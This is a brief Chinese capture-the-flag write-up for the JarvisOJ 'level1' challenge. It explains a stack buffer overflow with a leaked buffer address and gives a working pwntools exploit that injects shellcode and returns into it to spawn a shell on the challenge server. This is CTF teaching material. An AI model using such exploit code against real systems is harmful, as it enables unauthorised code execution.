checksec发现没有开保护机制,所以我们可以考虑使用shellcode方法pwn掉。
查看vulnerable_function函数内部
发现程序直接给我们了buf的首地址。点进去看之后发现,buf只能存0x88个字符,但是我们可以读入0x100个字符。由于读入的时候字符串会暂时存在栈上,我们可以考虑覆盖return的地址到buf的首地址中,然后在buf首地址开始写入shellcode,其余地方则可以填入垃圾信息。
至于计算填入垃圾信息的长度,可以先输入多余0x88个垃圾信息,然后转到汇编,查看执行到ret时的栈顶位置,栈顶存的地址即为ret到的地址,修改即可
计算可知,shellcode和垃圾信息一共要填入140的长度,然后加入buf的首地址即可
from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p=process('./level1')
p=remote('pwn2.jarvisoj.com',9877)
shellcode=asm(shellcraft.sh())
text=p.recvline()[14:-2]
buf_adr=int(text,16)
payload=shellcode+'A'*(140-len(shellcode))+p32(buf_adr)
p.send(payload)
p.interactive()